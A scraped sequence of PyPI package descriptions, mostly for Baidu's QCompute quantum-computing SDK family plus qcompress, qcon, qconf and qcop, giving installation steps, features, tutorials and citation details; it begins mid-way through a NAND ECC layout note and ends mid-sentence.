BCH, 16x bus: 8 bytes ECC8-Bit BCH, 8x bus: 13 bytes ECC8-Bit BCH, 16x bus: 14 bytes ECCRS: 10 bytes ECCThe chunk is then filled up with 0xff to make sure that it has a predefined\nsize. These size itself depends on the ECC algorithm:4-Bit BCH: 528 byte chunk8-Bit BCH: 532 byte chunkRS: 528 byte chunkMore information about the chunk layout can be found in Linux\u2019sqcom_qcom_nandc.cunderqcom_nandc_read_cw_raw().IPQ806x SBL pagesThe pages for the secondary bootloader on the IPQ806x didn\u2019t had a data\nsize of 516 bytes per chunk. Instead the data was written in 512 byte chunks\nwith Reed-Solomon ECC. A chunk will use 532 bytes (1 byte BBM, 10 bytes ECC, 5\nbytes padding). The rest of the rules from above still apply.ECCBCHThe polynomial used for calculating the data is 8219 or:x**13 + x**4 + x**3 + x**1 + 1RSThe used polynomial for GF(2**10) is 1033 or:x ** 10 + x ** 3 + 1The generator (first consecutive root) is:[1, 510, 51, 323, 663, 928, 58, 587, 836]The data itself is encoded with(1015 - chunk_data_size)0 bytes at the\nbeginning. The resulting 8 10 bit values are reversed, concatenated to a\nsingle 80 bits string and split again into 8 bits portions for storage on the\nNAND.RemarksThere is currently no official documentation from QCA regarding the NAND\ncontroller. Only available devices could be used to analyze the NAND content.\nFollowing features could not yet be tested:Reed Solomon ECC on modern devices4K pageswide bus mode"} +{"package": "qcompress", "pacakge-description": "DescriptionQCompress is a Python framework for the quantum autoencoder (QAE) algorithm. 
Using the code, the user can execute instances of the algorithm on either a quantum simulator or a quantum processor provided by Rigetti Computing\u2019sQuantum Cloud Services. For a more in-depth description of QCompress (including the naming convention for the types of qubits involved in the QAE circuit), clickhere.For more information about the algorithm, seeRomero et al. Note that we deviate from the training technique used in the original paper and instead introduce two alternative autoencoder training schemes that require lower-depth circuits (seeSim et al).FeaturesThis code is based on an olderversionwritten during Rigetti Computing\u2019s hackathon in April 2018. Since then, we\u2019ve updated and enhanced the code, supporting the following features:Executability on Rigetti\u2019s quantum processor(s)Several training schemes for the autoencoderUse of theRESEToperation for the encoding qubits (lowers qubit requirement)User-definable training circuit and/or classical optimization routineInstallationThere are a few options for installing QCompress:To install QCompress usingpip, execute:pipinstallqcompressTo install QCompress usingconda, execute:condainstall-crigetti-chsim13372qcompressTo instead install QCompress from source, clone this repository,cdinto it, and run:gitclonehttps://github.com/hsim13372/QCompresscdQCompresspython-mpipinstall-e.Try executingimport qcompressto test the installation in your terminal.Note that the pyQuil version used requires Python 3.6 or later. For installation on a user QMI, please clickhere.ExamplesWe provide several Jupyter notebooks to demonstrate the utility of QCompress. We recommend going through the notebooks in the order shown in the table (top-down).NotebookFeature(s)qae_h2_demo.ipynbSimulates the compression of the ground states of the hydrogen molecule. Uses OpenFermion and grove to generate data. Demonstrates the \u201chalfway\u201d training scheme.qae_two_qubit_demo.ipynbSimulates the compression of a two-qubit data set. Outlines how to run an instance on an actual device. Demonstrates the \u201cfull with reset\u201d training scheme.run_landscape_scan.ipynbShows user how to run landscape scans for small (few-parameter) instances. Demonstrates setup of the \u201cfull with no reset\u201d training scheme.DisclaimerWe note that there is a lot of room for improvement and fixes. Please feel free to submit issues and/or pull requests!How to citeWhen using QCompress for research projects, please cite:Sukin Sim, Yudong Cao, Jonathan Romero, Peter D. Johnson and Al\u00e1n Aspuru-Guzik.A framework for algorithm deployment on cloud-based quantum computers.arXiv:1810.10576. 2018.AuthorsSukin (Hannah) Sim(Harvard),Zapata Computing, Inc."} +{"package": "qcompute", "pacakge-description": "English |\u7b80\u4f53\u4e2d\u6587Quantum Leaf (in Chinese: \u91cf\u6613\u4f0f) - QComputeSDKFeaturesInstallEnvironment SetupInstall QComputeSDKRun ExampleBreaking ChangeIntroduction and DevelopmentsTutorialsAPI DocumentationDevelopmentDiscussion and FeedbacksDevelop with QComputeSDKFrequently Asked QuestionsCopyright and LicenseQuantum Leafis the world's first cloud-native quantum computing platform developed by theInstitute for Quantum Computing at Baidu Research. Users can use the Quantum Leaf for quantum programming, quantum simulation and running real quantum computers. 
Quantum Leaf aims to provide a quantum foundation development environment for QaaS (Quantum infrastructure as a Service).The QComputeSDK installation package is a complete open-source quantum computing framework implemented in Python. It adopts the classic quantum hybrid programming method and presets various advanced modules. Users can use the quantum environment object (QEnv) to quickly build quantum circuits, and can also use it to develop various complex quantum algorithms. QComputeSDK has multiple interfaces for local simulators, cloud simulators and real machines, allowing users to quickly simulate and verify quantum algorithms in local, and submit circuit tasks to real quantum hardware (superconductors, ion traps) or high-performance simulators on cloud.FeaturesEasy-to-useNearly 50 tutorial cases, and still increasing.Quantum circuit local visualization.Automatically call modules to complete quantum circuit compilation.VersatileSupport quantum circuit modularization.The local high-performance simulator supports the simulation of 32 qubits.The high-performance heterogeneous simulators on the cloud supports more qubit simulations.Support the simulation of various quantum noise models.Local GPU simulator based on NVIDIA cuQuantum.Local photonic quantum simulator supports the Gaussian/Fork state.Real quantum computing powerAccess to QPUQian, Baidu's superconducting quantum computer.Access to IonAPM, the ion trap quantum computer of the Innovation Academy for Precision Measurement Science and Technology, CAS.Access to IoPCAS, the superconducting quantum computer of the Institute of Physics, CAS.InstallEnvironment SetupWe recommend using conda to manager virtual environments,condacreate-nqcompute_envpython=3.10\ncondaactivateqcompute_envPlease refer toAnaconda's official installation.Note: Python version >= 3.9Install QComputeSDKInstall QComputeSDK withpip,pipinstallqcomputeor download all the files to install from sources. We recommend this installation. You can download from GitHub,gitclonehttps://github.com/baidu/QCompute.gitcdQCompute\npipinstall-e.or download from Gitee,gitclonehttps://gitee.com/baidu/qcompute.gitcdqcompute\npipinstall-e.Run ExampleIf all the files have been downloaded, you can now try to run a program to verify whether the installation is successful. Here we run the test script provided by QComputeSDK,python-mTest.PostInstall.PostInstall_testUser Token needs to be given on the command line before cloud testing, You can log in toQuantum Leafto check your Token. If you don't need to do cloud testing, please typeCtrl+c.Note: Please skip this step if you installed withpip.Breaking ChangeStarting with QComputeSDK 3.0.0, developers can run Baidu's superconducting quantum computer through QComputeSDK (device identifier:CloudBaiduQPUQian). The device provides services regularly, which can be viewed from theServices Status.Introduction and DevelopmentsTutorialsQComputeSDK is a quantum computing development framework that implements backend access to real quantum hardware. It builds a bridge between quantum computing and quantum hardware, providing strong support for the research and development of quantum algorithms and applications, and also providing a wealth of cases for developers to learn from.Here we provide primary, intermediate and advanced cases. With primary case, you can quickly get started with QComputeSDK, it includes quantum state preparation, classical quantum hybrid programming, circuit task submission to quantum computers, etc. 
The intermediate case is the use of QComputeSDK, including the calling of modules, the use of convertors, etc. The advanced case is the implementation of advanced quantum algorithms on QComputeSDK. We have provided detailed tutorial documents for these algorithms.Primary CasesGHZ state preparation (local)GHZ state preparation (cloud)Bell state preparation (local)Bell state preparation (cloud)Classical quantum hybrid language (local)Classical quantum hybrid language (cloud)Classical quantum information interaction (local)Classical quantum information interaction (cloud)QPU - BaiduQPUQianQPU - IonAPMQPU - IoPCASPhotonic quantum circuit simulation based on Fock statePhotonic quantum circuit simulation based on Gaussian stateGPU simulator based on cuQuantumUniversal blind quantum computationQuantum Noise SimulationAdding noise to the circuitQuantum noise compression moduleOne-qubit circuit with noise simulationNoise simulation with multiple processesTwo-qubit circuit with noise simulationIntermediate CasesOutput Information SettingsTutorialResults printing information settingsOutput file automatic cleaningGeneral ModulesTutorialModule usage examplesQuantum circuit inverse moduleQuantum circuit reverse moduleQuantum procedure unroll moduleQuantum gate decomposition moduleQuantum gate compression moduleConvertorsTutorialCircuit serializationConsole drawingConvert circuit serialization and deserializationConvert circuit to JSONConvert circuit to QASMConvert circuit to QOBJConvert circuit to IonQConvert circuit to XanaduAdvanced CasesQuantum Superdense CodingDeutsch-Jozsa AlgorithmQuantum Phase Estimation (QPE)Grover's Search AlgorithmShor's AlgorithmVariational Quantum Eigensolver (VQE)Variational Quantum State Diagonalization (VQSD)In recent updates, QComputeSDK has added a photonic quantum computing simulator (LocalBaiduSimPhotonic). Unlike traditional quantum circuit, photonic quantum computing has its own unique way of running. QComputeSDK supports the optical system on the architecture, and also becomes the first quantum development kit that integrates quantum computing and photonic quantum computing. Interested readers can refer toPhotonic Quantum Computing Simulator Tutorial.API DocumentationTo learn more about how to use QComputeSDK, please refer to theAPI documentation, which contains detailed descriptions and usage of all functions and classes available to users.DevelopmentQComputeSDK includes quantum computing architecture, quantum computing simulator, tutorials, and extensions. For developers who need to involve the code of the architecture or simulator, it is recommended to install from sources. For developers or researchers who use QComputeSDK to develop quantum algorithm applications, it is recommended to useGHZ_Cloud.pyas the code framework. Modifying and using this file can effectively help you learn the syntax of this quantum development kit. It is recommended that developers be familiar with the circuit construction of QComputeSDK, and pay attention to the qubit output order.Discussion and FeedbacksWe welcome your questions, reports and suggestions. You can feedback through the following channels:GitHub Issues/Gitee IssuesQuantum Leaf FeedbackEmail:quantum@baidu.comYou are welcomed to join our discussion QQ group (group number: 1147781135). You can scan QR code into the group.Develop with QComputeSDKWe welcome developers to use QComputeSDK for quantum application development. If your work uses QComputeSDK, we also welcome you to contact us. 
The following are quantum applications developed based on QComputeSDK:QEP (Quantum Error Processing), a set of quantum noise processing tools developed by the Institute for Quantum Computing at Baidu Research. It offers four powerful functions: performance evaluation, quantum error characterization, quantum error mitigation, and quantum error correction.UBQC (Universal Blind Quantum Computation), a blind quantum computing proxy service based on the UBQC protocol developed by the Institute for Quantum Computing at Baidu Research.QAPPis a set of quantum computing solution tools developed based on QComputeSDK, providing quantum computing solution services for a variety of field problems including quantum chemistry, combinatorial optimization, and machine learning.QSVT (Quantum Singular Value Transformation), a set of quantum singular value transformation tools developed by the Institute for Quantum Computing at Baidu Research, with main functions including quantum singular value transformation, symmetric quantum signal processing, and Hamiltonian quantum simulation.QFinance, a quantum finance library developed by the Institute for Quantum Computing at Baidu Research, providing a Quantum Monte Carlo method for price European options.PQS (Photonic Quantum Simulator), a photonic quantum computing simulator developed by the Institute for Quantum Computing at Baidu Research, supporting photonic quantum circuit simulation based on Gaussian state and Fock state.FAQQuestion:What can be done with QComputeSDK? What are the applications?Answer: QComputeSDK is a quantum computing development framework based on Python that can be used to build, run, and optimize quantum circuits. We have built a comprehensive and complete infrastructure in QComputeSDK to support the implementation of various quantum algorithms, it has a wide range of application scenarios in the development of quantum applications. Specific work can be referred to but not limited to theExtensionsin QComputeSDK.Question\uff1aI want to use QComputeSDK for quantum programming, but I don't know much about quantum computing. How do I get started?Answer: Quantum Computation and Quantum Information by Nielsen & Chuang is the classic introductory textbook to QC. We recommend readers to study Chapter 1, 2, and 4 of this book first. These chapters introduce the basic concepts, provide solid mathematical and physical foundations, and discuss the quantum circuit model widely used in QC. Readers can also learn onQuLearn, which is an online quantum learning knowledge base that not only contains quantum computing tutorials, but also rich video sources. Readers can also download the Quantum Leaf APP (https://quantum-hub.baidu.com/qmobile), and the Playground on the APP contains a wealth of interesting quantum examples to help readers learn anytime, anywhere.Question:Is QComputeSDK free?Answer: QComputeSDK is free. QComputeSDK is an open source SDK. It is free for users to execute local simulation tasks. When the user submits the task to the cloud simulator or the real machine through QComputeSDK, a certain number of points will be deducted. For detailed deduction rules, please refer to theUser Guide. When the user creates an account, we will give away points. The point balance can be viewed in thePersonal Center.Question:How can I get more points?Answer: Points are currently only used for resource control. If the points are insufficient, you can submit an application from theFeedbackon the Quantum Leaf website or theUser Feedbackof Quantum Leaf APP. 
We will deal with your request in three working days.Copyright and LicenseQComputeSDK usesApache-2.0 license."} +{"package": "qcompute-qapp", "pacakge-description": "English |\u7b80\u4f53\u4e2d\u6587QCompute-QAPP User's GuideCopyright (c) 2021 Institute for Quantum Computing, Baidu Inc. All Rights Reserved.QAPP IntroductionQAPP is a quantum computing toolbox based on theQComputecomponent ofQuantum Leaf, which provides quantum computing services for solving problems in many fields including quantum chemistry, combinatorial optimization, machine learning, etc. QAPP provides users with a one-stop quantum computing application development function, which directly connects to users' real requirements in artificial intelligence, financial technology, education and research.QAPP ArchitectureQAPP architecture follows the complete development logic from application to real machine, including four modules: Application, Algorithm, Circuit, and Optimizer. The Application module converts the user requirements into the corresponding mathematical problem; the Algorithm module selects a suitable quantum algorithm to solve the mathematical problem; during the solution process, the user can specify the optimizer provided in the Optimizer module or design a custom optimizer; the quantum circuit required for the solution process is supported by the Circuit module. The Circuit module directly calls theQComputeplatform, and supports calls to theQuantum Leafsimulators or QPUs.QAPP Use CasesWe provide QAPP practical cases such as solvingmolecular ground state energy, solvingcombinatorial optimization problem, and solvingclassification problem. These use cases are designed to help users quickly get started with calling QAPP modules and developing custom algorithms. Before we can run these use cases, there is some preparation work to do.Install Conda and Python environmentWe useAnacondaas the development environment management tool for Python. Anaconda supports multiple mainstream operating systems (Windows, macOS, and Linux). Here we provide a tutorial on how to use conda to create and manage virtual environments:First, enter the command line (Terminal) interface: Windows users can enterAnaconda Prompt; Mac users can use the key combinationcommand\u2318 + spaceand then enterTerminal.After opening the Terminal window, entercondacreate--nameqapp_envpython=3.8to create a Python 3.8 environment namedqapp_env. With the following command, we can enter the virtual environment created,condaactivateqapp_envFor more detailed instructions on conda, please refer to theOfficial Tutorial.Credit PointsIf you run QAPP with cloud servers, you will consume Quantum-hub credit points. For more Quantum-hub credit points, please contact us viaQuantum Hub. First, you should log intoQuantum Hub, then enter the \"Feedback\" page, choose \"Get Credit Point\", and record the necessary information. Submit your feedback and wait for our reply. We will reach you as soon as possible.Install QCompute and packages required by QAPPInstall QAPP withpip:pipinstallqcompute-qappSome use cases may require additional packages, which are clarified in the corresponding tutorials.RunUsers can download thetutorialsfolder from GitHub, switch the path to thetutorialsfolder where the case is located in Terminal, and run it in Python. For example,pythonvqe_example.pyAPI DocumentationWe provide QAPP'sAPIdocumentation for developers to look up. 
Users can also view the API documentation on theQuantum Leaf website.CitationWe encourage the researchers and developers to use QAPP for research & development on quantum computing applications. Please cite us by including the following BibTeX entry:@misc{QAPP,title={{Quantum Application Python Package}},year={2022},url={https://quantum-hub-test.baidu.com/qapp/},}Copyright and LicenseQAPP usesApache-2.0 license."} +{"package": "qcompute-qep", "pacakge-description": "Copyright (c) 2022 Institute for Quantum Computing, Baidu Inc. All Rights Reserved.About QEPQEPis aQuantumErrorProcessing toolkit developed by theInstitute for\nQuantum ComputingatBaidu Research. It\naims to deal with quantum errors inherent in quantum devices using software solutions. Currently,\nit offers four powerful quantum error processing functions: performance evaluation,\nquantum error characterization, quantum error mitigation, and quantum error correction:Performance Evaluationis used for assessing the capabilities and extendibilities of\nquantum computing hardware platforms, through estimating the error rates of quantum states,\nquantum gates, and quantum measurement apparatus. It provides\nstandard randomized benchmarking, interleaved randomized benchmarking, cross-entropy\nbenchmarking, unitarity randomized benchmarking, direct fidelity estimation, and\ncross-platform fidelity estimation methods.Quantum Error Characterizationis used for reconstructing the comprehensive information in\nquantum computing hardware platforms, through many partial and limited experimental results.\nIt provides quantum state tomography, quantum process tomography, quantum detector tomography,\nquantum gateset tomography, and spectral quantum tomography.Quantum Error Mitigationis used for improving the accuracy of quantum computational\nresults, through post-processing the experiment data obtained by varying noisy experiments,extending the computational reach of a noisy superconducting quantum processor. It provides\nzero-noise extrapolation technique to mitigate quantum gate noise, and a collection of methods\nsuch as inverse, least-square, iterative Bayesian unfolding, Neumann series to mitigate quantum measurement noise.Quantum Error Correction (QEC)is used to protect quantum information from errors due to\nenvironmental noise and imperfections in hardware. Quantum computers rely on the delicate\nproperties of quantum systems, which are susceptible to errors, and thus, QEC has become an\nessential tool for realizing fault-tolerant quantum computing. It provides a simulator that\ncan simulate error correction codes based on the stabilizer formalism, allowing users to study\nthe effects of various types of noise, assess the performance of different error correction\ncodes, and evaluate the robustness of quantum algorithms to errors.QEP is based onQCompute,\nwhich a Python-based open-source quantum computing platform SDK also developed\nbyInstitute for Quantum Computing.\nIt provides a full-stack programming experience for senior users via hybrid quantum programming language\nfeatures and high-performance simulators.\nYou can install QCompute viapypi.\nWhen you install QEP, QCompute will be automatically installed.\nPlease refer to QCompute's officialOpen Sourcepage for more details.InstallationInstall QEPThe package QEP is compatible with 64-bit Python 3.8 and 3.9, on Linux, MacOS (10.14 or later) and Windows. We highly recommend the users to install QEP viapip. 
Open the Terminal and runpipinstallqcompute-qepThis will install the QEP binaries as well as the QEP package. For those using an older version of QEP, keep up to date by installing with the--upgradeflag for additional features and bug fixes.Run ExamplesAfter installation, you can try the following simple program to check whether QEP has been successfully installed.fromQComputeimport*importqcompute_qep.tomographyastomography# Step 1. Initialize a quantum program for preparing the Bell stateqp=QEnv()# qp is short for \"quantum program\", instance of QProgramqp.Q.createList(2)H(qp.Q[0])CX(qp.Q[0],qp.Q[1])# Step 2. Set the quantum computer (instance of QComputer).# For debugging on ideal simulator, change qc to BackendName.LocalBaiduSim2qc=BackendName.LocalBaiduSim2# For test on real quantum hardware, change qc to BackendName.CloudBaiduQPUQian# You must set your VIP token in order to access the hardware# Define.hubToken = \"Token\"# qc = BackendName.CloudBaiduQPUQian# Step 3. Perform Quantum State Tomography, check how well the Bell state is prepared.st=tomography.StateTomography()# Alternatively, you may initialize the StateTomography instance as follows:# st = StateTomography(qp, qc, method='inverse', shots=4096)# Call the tomography procedure and obtain the noisy quantum statest.fit(qp,qc,method='inverse',shots=4096)print(\"***********************************************************************\")print(\"Testing whether 'qcompute-qep' is successfully installed or not now ...\\n\")print('Fidelity of the Bell state is: F ={:.5f}'.format(st.fidelity))print(\"Please change 'qc' to other quantum computers for more tests.\\n\")print(\"Package 'qcompute-qep' is successfully installed! Please enjoy!\")print(\"***********************************************************************\")Note that more examples are provided in theAPI documentation,\ntheQEP Tutorials, and the source\nfile of QEP hosted inGitHub.\nYou can get started from there.TutorialsQEP provides detailed and comprehensive tutorials for performance evaluation, quantum error\ncharacterization, quantum error mitigation, and quantum error correction,\nranging from theoretical analysis to practical application.\nWe recommend the interested researchers or developers to download the Jupyter Notebooks and try it.\nThe tutorials are listed as follows:Performance EvaluationStandard Randomized BenchmarkingInterleaved Randomized BenchmarkingCross-Entropy BenchmarkingUnitarity Randomized BenchmarkingDirect Fidelity Estimation of Quantum StatesDirect Fidelity Estimation of Quantum ProcessesCross-Platform Estimation of Quantum StatesQuantum Error CharacterizationQuantum State TomographyQuantum Process TomographyQuantum Detector TomographyQuantum Gateset TomographySpectral Quantum TomographyQuantum Error MitigationZero-Noise ExtrapolationMeasurement Error MitigationApplications of Measurement Error MitigationQuantum Error CorrectionStabilizer Code SimulatorMore tutorials and demonstrations will be included in the future release.API DocumentationFor those who are looking for explanation on the python classes and functions in QEP,\nplease refer to ourAPI documentation.FeedbacksUsers are encouraged to contact us via emailquantum@baidu.comwith general questions,\nunfixed bugs, and potential improvements. 
We hope to make QEP better together with the community!Research based on QEPWe encourage researchers and developers to use QEP to explore quantum error processing.\nIf your work uses QEP, please feel free to send us a notice viaquantum@baidu.comand\ncite us with the following BibTeX:@misc{QEP,author={{Baidu Quantum}},title={{Quantum Error Processing Toolkit (QEP)}},year={2022},url={https://quantum-hub.baidu.com/qep/},version={1.1.0}}Copyright and LicenseQEP usesApache-2.0 license."} +{"package": "qcompute-qnet", "pacakge-description": "Copyright (c) 2022 Institute for Quantum Computing, Baidu Inc. All Rights Reserved.About QNETQNET is a Quantum NETwork toolkit developed by theInstitute for Quantum ComputingatBaidu Research. It aims to accelerate the design of quantum network protocols, the testing of quantum network architectures and the deployment of quantum internet standards. QNET provides a fully-featured discrete-event simulation framework that allows for both accurate and efficient tracking of quantum network status. Its modular design provides a testbed for different quantum network architectures.FeaturesQNET is under active development and the latest version has the following key features:discrete-event simulation framework that allows for both accurate and efficient system tracking;quantum hardware interface that accelerates protocols testing and deployment;physical devices modeling that supports the simulation of realistic experiments;frequently-used templates that speed up the workflow of research and development;modular design that is compatible with different quantum network architectures.InstallationCreate Python environmentWe recommend using Anaconda as the development environment management tool for Python3. Anaconda supports multiple mainstream operating systems (Windows, macOS, and Linux). It provides Scipy, Numpy, Matplotlib, and many other scientific computing and drawing packages. Conda, a virtual environment manager, can be used to install and update the latest Python packages. Here we give simple instructions on how to use conda to create and manage virtual environments.First, open the command line (Terminal) interface: Windows users can enterAnaconda Prompt; MacOS users can use the key combinationcommand + spaceand then enterTerminal.After opening the Terminal window, entercondacreate--nameqnet_envpython=3.8to create a Python 3.8 environment named qnet_env. With the following command, we can activate the virtual environment created,condaactivateqnet_envFor more detailed instructions on conda, please refer to theOfficial Tutorial.Install QNETQNET is compatible with 64-bit Python 3.8+, on Linux, MacOS (10.14 or later) and Windows. We recommend installing it withpip. Activate the conda environment and enterpipinstallqcompute-qnetThis will install the QNET binaries as well as the QNET package. For those using an older version of QNET, keep up to date by installing with the--upgradeflag for additional features and bug fixes.Run examplesNow, you can try to write a simple program to check whether QNET has been successfully installed. 
For example,fromqcompute_qnet.core.desimportDESEnvfromqcompute_qnet.topologyimportNetwork,Node,Link# Create a simulation environmentenv=DESEnv(\"Simulation Environment\",default=True)# Create a networknetwork=Network(\"First Network\")# Create a node named Alicealice=Node(\"Alice\")# Create another node named Bobbob=Node(\"Bob\")# Create a link between Alice and Boblink=Link(\"Alice_Bob\",ends=(alice,bob))# Build up the network from nodes and linksnetwork.install([alice,bob,link])# Initialize the simulation environmentenv.init()# Run the network simulationenv.run()Note that more examples are provided in theAPI documentation. You can get started from there.TutorialsWe provide severaltutorialsto help users get started with QNET. These include:Introduction to discrete-event simulationTour guide to quantum network simulationMicius quantum satellite experimentQuantum network architecture simulationQuantum network architecture with resource managementQuantum network protocols on quantum hardware devicesQuantum teleportationQuantum entanglement swappingCHSH gameMagic square gameMeasurement-based quantum computationDynamic quantum circuitMore tutorials and demonstrations will be included in the future release.API documentationFor those who are looking for explanation on the python classes and functions provided in QNET, please refer to ourAPI documentation.FeedbacksUsers are encouraged to contact us via emailquantum@baidu.comwith general questions, unfixed bugs, and potential improvements. We hope to make QNET better together with the community!Research based on QNETWe also encourage researchers and developers to use QNET to explore quantum networks. If your work uses QNET, feel free to send us a notice viaquantum@baidu.comand cite us with the following BibTeX:@misc{QNET,title={{Quantum NETwork in Baidu Quantum Platform}},year={2022},url={https://quantum-hub.baidu.com/qnet/}}Copyright and LicenseQNET usesApache-2.0 license."} +{"package": "qcompute-qsvt", "pacakge-description": "Copyright (c) 2022 Institute for Quantum Computing, Baidu Inc. All Rights Reserved.About QSVT ToolkitQSVTtoolkit is aQuantumSingularValueTransformation toolkit based onQComputeand developed by theInstitute for Quantum ComputingatBaidu Research. It aims to implement quantum simulation and other algorithms on quantum devices or simulators more conveniently. Currently, it includes three main modules:Quantum Singular Value Transformation(QSVT) is used for implementing singular value transformations of quantum operations, whose input and output are both block-encodings of quantum operations.Symmetric Quantum Signal Processing(SQSP) is used for encoding such transformation functions and completing such quantum circuits in QSVT. SQSP is introduced for implementing the encoding step more effectively.Hamiltonian Simulationis one of the most significant applications for QSVT, and even quantum computing. It provides functions to generate quantum circuits for time evolution operators of Hamiltonians.QSVT toolkit is based onQCompute, a Python-based open-source quantum computing platform SDK also developed byInstitute for Quantum Computing. It provides a full-stack programming experience for senior users via hybrid quantum programming language features and high-performance simulators. You can install QCompute viapypi. When you install QSVT toolkit, the dependency QCompute will be automatically installed. 
Please refer to QCompute's officialOpen Sourcepage for more details.InstallationCreate Python EnvironmentWe recommend using Anaconda as the development environment management tool for Python3. Anaconda supports multiple mainstream operating systems (Windows, macOS, and Linux). It provides Scipy, Numpy, Matplotlib, and many other scientific computing and drawing packages. Conda, a virtual environment manager, can be used to install and update the latest Python packages. Here we give simple instructions on how to use conda to create and manage virtual environments.First, open the command line (Terminal) interface: Windows users can enterAnaconda Prompt; macOS users can use the key combinationcommand + spaceand then enterTerminal.After opening the Terminal window, entercondacreate--nameqsvt_envpython=3.9to create a Python 3.9 environment namedqsvt_env. With the following command, we can activate the virtual environment created,condaactivateqsvt_envFor more detailed instructions on conda, please refer to theOfficial Tutorial.Install QSVT ToolkitQSVT toolkit is compatible with 64-bit Python 3.9, on Linux, macOS (10.14 or later) and Windows. We recommend installing it withpip. After Activating the conda environment, then enterpipinstallqcompute-qsvtThis will install the QSVT toolkit binaries as well as the QSVT toolkit package.For those using an older version of QSVT toolkit, update by installing with the--upgradeflag. The new version includes additional features and bug fixes.Run ExamplesNow, you can try to write a simple program to check whether QSVT toolkit has been successfully installed. For example, run the following program,importnumpyasnpfromQComputeimport*fromqcompute_qsvt.Application.HamiltonianSimulationimportfunc_HS_QSVTfunc_HS_QSVT(list_str_Pauli_rep=[(1,'X0X1'),(1,'X0Z1'),(1,'Z0X1'),(1,'Z0Z1')],num_qubit_sys=2,float_tau=-np.pi/8,float_epsilon=1e-6,circ_output=False)we will operate a time evolution operator on initial state $|00\\rangle$ for Hamiltonian $X\\otimes X + X\\otimes Z + Z\\otimes X + Z\\otimes Z$ and time $-\\pi/8$ with precision1e-6, and then measure such final state.Note that more examples are provided in thesource codes,tutorialsandAPI documentation. You can get started from there.TutorialsQSVT toolkit providesquick startfor using the Hamiltonian Simulation module, as well as abrief introductionto the theories for users to learn and get started. The current content of the following tutorial is organized as follows, and it is recommended that beginners read and study in order:Brief IntroductionQuantum Signal ProcessingBlock-Encoding and Linear Combination of Unitary OperationsQuantum Eigenvalue and Singular Value TransformationHamiltonian SimulationWe will supply more detailed and comprehensive tutorials in the future.API DocumentationFor those who are looking for explanation on the python classes and functions in QSVT toolkit, please refer to ourAPI documentation.FeedbacksUsers are encouraged to contact us via emailquantum@baidu.comwith general questions, unfixed bugs, and potential improvements. We hope to make QSVT toolkit better together with the community!Research based on QSVT ToolkitWe encourage researchers and developers to use QSVT toolkit to explore quantum algorithms. 
If your work uses QSVT toolkit, please feel free to send us a notice viaquantum@baidu.comand cite us with the following BibTeX:@misc{QSVT,title={{Quantum Sigular Value Transformation toolkit in Baidu Quantum Platform}},year={2022},url={https://quantum-hub.baidu.com/qsvt/}}ChangelogThe changelog of this project can be found inCHANGELOG.md.Copyright and LicenseQSVT toolkit usesApache-2.0 license."} +{"package": "qComputing", "pacakge-description": "No description available on PyPI."} +{"package": "qcon", "pacakge-description": "qcon is program for hiding/showing terminal emulators(or other software) with a hotkey.\nSimilar to consoles you see in many FPS games.\nUnlike similar projects like guake/yakuake you can use any terminal emulator of your choice.\nSeveral terminals(or other software) can be configured.\nIt\u2019s compact and consists of a single file."} +{"package": "qconcurrency", "pacakge-description": "No description available on PyPI."} +{"package": "qconf", "pacakge-description": "No description available on PyPI."} +{"package": "qconfig", "pacakge-description": "open-qconfig-pyOpen Source lightweight version of qconfigQConfig EnterpriseEnterprise version available athttps://www.qsonlabs.com"} +{"package": "qconf-py", "pacakge-description": "Description for setup.pyUsage: python setup.py build\nwhich will generate the qconf_py library in build/lib.linux-x86_64-X.X as qconf_py.soParamters of Extension:\nname : the full name of the extension, including any packages ? ie. not a filename or pathname, but Python dotted name;sources : list of source filenames, relative to the distribution root (where the setup script lives), in Unix form (slash- separated) for portability. Source files may be C, C++, SWIG (.i), platform-specific resource files, or whatever else is recognized by the build_ext command as source for a Python extension.\n\ninclude_dirs : list of directories to search for C/C++ header files (in Unix form for portability);\n\nextra_objects : list of extra files to link with (eg. object files not implied by \u00a1\u00aesources\u00a1\u00af, static library that must be explicitly specified, binary resource files, etc.)\n\nlibrary_dirs : list of directories to search for C/C++ libraries at link time\n\nlibraries : list of library names (not filenames or paths) to link against"} +{"package": "qcop", "pacakge-description": "Quantum Chemistry OperateA package for operating Quantum Chemistry programs usingqciostandardized data structures. Compatible withTeraChem,psi4,QChem,NWChem,ORCA,Molpro,geomeTRICand many more.qcopworks in harmony with a suite of other quantum chemistry tools for fast, structured, and interoperable quantum chemistry.The QC Suite of Programsqcio- Beautiful and user friendly data structures for quantum chemistry.qcparse- A library for efficient parsing of quantum chemistry data into structuredqcioobjects.qcop- A package for operating quantum chemistry programs usingqciostandardized data structures. Compatible withTeraChem,psi4,QChem,NWChem,ORCA,Molpro,geomeTRICand many more.BigChem- A distributed application for running quantum chemistry calculations at scale across clusters of computers or the cloud. Bring multi-node scaling to your favorite quantum chemistry program.ChemCloud- Aweb applicationand associatedPython clientfor exposing a BigChem cluster securely over the internet.InstallationpipinstallqcopQuickstartqcopuses theqciodata structures to drive quantum chemistry programs in a standardized way. 
This allows for a simple and consistent interface to a wide variety of quantum chemistry programs. See theqciolibrary for documentation on the input and output data structures.Thecomputefunction is the main entry point for the library and is used to run a calculation.fromqcioimportMolecule,ProgramInputfromqcopimportcompute# Create the moleculeh2o=Molecule.open(\"h2o.xyz\")# Define the program inputprog_input=ProgramInput(molecule=h2o,calctype=\"energy\",model={\"method\":\"hf\",\"basis\":\"sto-3g\"},keywords={\"purify\":\"no\",\"restricted\":False},)# Run the calculationoutput=compute(\"terachem\",prog_input,collect_files=True)# Inspect the outputoutput.input_data# Input data used by the QC programoutput.success# Whether the calculation succeededoutput.results# All structured results from the calculationoutput.stdout# Stdout log from the calculationoutput.pstdout# Shortcut to print out the stdout in human readable formatoutput.files# Any files returned by the calculationoutput.provenance# Provenance information about the calculationoutput.extras# Any extra information not in the schemaoutput.traceback# Stack trace if calculation failedoutput.ptraceback# Shortcut to print out the traceback in human readable formatAlternatively, thecompute_argsfunction can be used to run a calculation with the input data structures passed in as arguments rather than as a singleProgramInputobject.fromqcioimportMoleculefromqcopimportcompute_args# Create the moleculeh2o=Molecule.open(\"h2o.xyz\")# Run the calculationoutput=compute_args(\"terachem\",h2o,calctype=\"energy\",model={\"method\":\"hf\",\"basis\":\"sto-3g\"},keywords={\"purify\":\"no\",\"restricted\":False},files={...},collect_files=True)The behavior ofcompute()andcompute_args()can be tuned by passing in keyword arguments likecollect_filesshown above. Keywords can modify which scratch directory location to use, whether to delete or keep the scratch files after a calculation completes, what files to collect from a calculation, whether to print the program stdout in real time as the program executes, and whether to propagate a wavefunction through a series of calculations. Keywords also include hooks for passing in update 